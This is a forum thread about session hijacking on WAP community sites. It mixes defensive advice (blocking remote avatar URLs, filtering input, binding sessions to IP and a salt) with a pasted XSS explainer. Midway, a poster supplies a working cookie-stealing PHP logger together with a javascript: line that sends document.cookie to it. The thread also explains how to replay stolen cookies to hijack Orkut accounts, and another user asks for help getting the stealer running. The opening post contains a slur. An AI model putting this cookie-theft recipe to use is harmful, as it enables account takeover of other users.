Hacking (Lavalair Script)

some faggot is probably stealing your session using a pic on another site to grab the referring url which includes your session id

best thing to do is check every users profile pic that have sent you an inbox then ban the ****ers

disable images on profiles for users that way only admin can add the pics or a user can upload ther own jpg image to ther profile thus stopping them from using those image scripts

u can also run the profile pics thru phpthumb or any other thumbnail script should do ok as that 1 doesnt show the referer

how can some1 steal session from his pic bcoz many users pic including the url of another site where their pics has been uploaded like wen.ru etc or url of gallery of that site where they uploaded pic in gallery.

theres few ways....

4 example if u use a pic thts on my server, i just have 2 look logs on my server, no additional scripts or codes needed...
a common mistake is tht some "wapmasters" uses icons from other sites lol not downloading it, but they just copy url of img and paste it into the code lol so u come 2 ur server and u see bunch of hits from somesite.com lol all u have 2 do is waiting 4 admin login to his site and its over...

then, also i see some of them put a link to other sites either as link on main page as advertisement a "friends" sites, either as links exchange in topics lol each click on tht link leaves a referrer link on the other server, ofcourse with ur session lol also no additional scripts or codes needed...

then... if user uses a php pic, every time u see his profil u leave him referer link with ur session... if he see ur session and its still active, ur gone...and its easy 2 make one lol even on this site theres few image script tht u can use 4 it...just 1 thing needed more 2 complete it... referrer link....

etc...

just simply dont allow entering url address 4 profil pics.... let them use ur uploaded avatars etc....
its somehow a protection.... not FULLLLLLLLL, far from tht, but its a start u can start of

I hope that im not gonna be banned for saying this.

Its simple to enter mod cp or even in admin cp, put in browser



To moderate user put



How to stop this,

Just write </wml> exit(); to close the code.

old news.... even birds knows this LoL:p
and u didint even posted a correct part of bug :p

Ok birdy, correct me then with new stuff and right part of bugg hahaha...

( and my mistake, didn't read the whole first post. Sorry Alesh )

The thing is that u shold close the code with </wml> exit; on every page where needed and at modcp, admincp, modproc, admproc, and that shold stop others to enter in the mod or admin cp.

the user is using cross scripting technique to hijack your session here is an example of the technique
it is possible to modify such scripts to represent images
By reading this article you are agreeing to the point that you will not use this cookie stealing script to harm any one, but only for experimental purposes.

<?php
$c = $_GET['c'];
$file = fopen(’cookie.txt’,'a’);
fwrite($file,$c);
fclose($file);
?>

The above PHP code represents the simplest cookie stealing script, copy this and save it with the name c.php and upload it to any free PHP enabled server such as Freehostia or Awardspace. This script takes cookie from a javascript and then writes it into the file cookie.txt You can take a look at the cookie by opening the cookie.txt file. Now below I’ll give a javascript that can send the cookie to this PHP script.

javascript:document.location='location where you uploaded the script'+document.cookie;

Now to get Orkut cookie, you’ll have to login to Orkut and then run the script and then you’ll get Orkut cookies. You will not get Yahoo cookie if you run this from the page where you have logged into Orkut.
Cookies have login details but not passwords

Yeah, cookie does not have a password but it has login details that are required by the servers. It makes the servers think that you have already entered the password if you edit and put the cookies. Use Firefox add on “Add and Edit Cookies” for this purpose.

You should always filter user input that is stored or processed on a server because URLs and GET/POST requests can be created manually.

this code can help in filtering data submitted by user.

thanks bro.


i tried uploading c.php in my free host but when i open that destination in my browser like mysite.freehostia.com/c.php the page displaying blank


and where should i have to enter this javascript


javascript:document.location='location where you uploaded the script'+document.cookie;

What is Cross site Scripting?

Hackers are constantly experimenting with a wide repertoire of hacking techniques to compromise websites and web applications and make off with a treasure trove of sensitive data including credit card numbers, social security numbers and even medical records.

Cross Site Scripting (also known as XSS or CSS) is generally believed to be one of the most common application layer hacking techniques.



In general, cross-site scripting refers to that hacking technique that leverages vulnerabilities in the code of a web application to allow an attacker to send malicious content from an end-user and collect some type of data from the victim.

Today, websites rely heavily on complex web applications to deliver different output or content to a wide variety of users according to set preferences and specific needs. This arms organizations with the ability to provide better value to their customers and prospects. However, dynamic websites suffer from serious vulnerabilities rendering organizations helpless and prone to cross site scripting attacks on their data.

"A web page contains both text and HTML markup that is generated by the server and interpreted by the client browser. Web sites that generate only static pages are able to have full control over how the browser interprets these pages. Web sites that generate dynamic pages do not have complete control over how their outputs are interpreted by the client. The heart of the issue is that if mistrusted content can be introduced into a dynamic page, neither the web site nor the client has enough information to recognize that this has happened and take protective actions." (CERT Coordination Center).

Cross Site Scripting allows an attacker to embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page to fool the user, executing the script on his machine in order to gather data. The use of XSS might compromise private information, manipulate or steal cookies, create requests that can be mistaken for those of a valid user, or execute malicious code on the end-user systems. The data is usually formatted as a hyperlink containing malicious content and which is distributed over any possible means on the internet.

As a hacking tool, the attacker can formulate and distribute a custom-crafted CSS URL just by using a browser to test the dynamic website response. The attacker also needs to know some HTML, JavaScript and a dynamic language, to produce a URL which is not too suspicious-looking, in order to attack a XSS vulnerable website.

Any web page which passes parameters to a database can be vulnerable to this hacking technique. Usually these are present in Login forms, Forgot Password forms, etc…

N.B. Often people refer to Cross Site Scripting as CSS or XSS, which is can be confused with Cascading Style Sheets (CSS).

Is your site vulnerable to Cross Site Scripting
Our experience leads us to conclude that the cross-site scripting vulnerability is one of the most highly widespread flaw on the Internet and will occur anywhere a web application uses input from a user in the output it generates without validating it. Our own research shows that over a third of the organizations applying for our free audit service are vulnerable to Cross Site Scripting. And the trend is upward.


Example of a Cross Site Scripting attack
As a simple example, imagine a search engine site which is open to an XSS attack. The query screen of the search engine is a simple single field form with a submit button. Whereas the results page, displays both the matched results and the text you are looking for.

Example:
Search Results for "XSS Vulnerability"

To be able to bookmark pages, search engines generally leave the entered variables in the URL address. In this case the URL would look like:



Vulnerability

Next we try to send the following query to the search engine:

<script type="text/javascript"> alert('This is an XSS Vulnerability') </script>

By submitting the query to search.php, it is encoded and the resulting URL would be something like:



Ealert%28%91This%20is%20an%20XSS%20Vulnerability%9 2%2

9%3C%2Fscript%3E

Upon loading the results page, the test search engine would probably display no results for the search but it will display a JavaScript alert which was injected into the page by using the XSS vulnerability.

How to check for Cross site scripting vulnerabilities
To check for Cross site scripting vulnerabilities, use a Web Vulnerability Scanner. A Web Vulnerability Scanner crawls your entire website and automatically checks for Cross Site Scripting vulnerabilities. It will indicate which URLs/scripts are vulnerable to these attacks so that you can fix the vulnerability easily. Besides Cross site scripting vulnerabilities a web application scanner will also check for SQL injection & other web vulnerabilities.

Acunetix Web Vulnerability Scanner scans for SQL injection, Cross site scripting, Google hacking and many more vulnerabilities.

Preventing Cross Site Scripting attacks
To prevent these attacks, dangerous characters must be filtered out from the web application inputs. These should be filtered out both in their ASCII and HEX values.

cant i use like a image filter or something to block them from seeing the session id?

u can make sumkind check...

4 example... at my site i can even give u my active session, but u can do **** with it...

because if u change ur browser or ip etc during browsing the site u r redirected bye bye... u have 2 login again, but if u steal session, then u dont know password right? lol
sooo u can guess browser and ip address, soooooooo what..., but then again ull never guess my beyond imagine $salt...:p

so i gave u a hint....

$salt saveeeeeeeeeeeeeeees ass! lol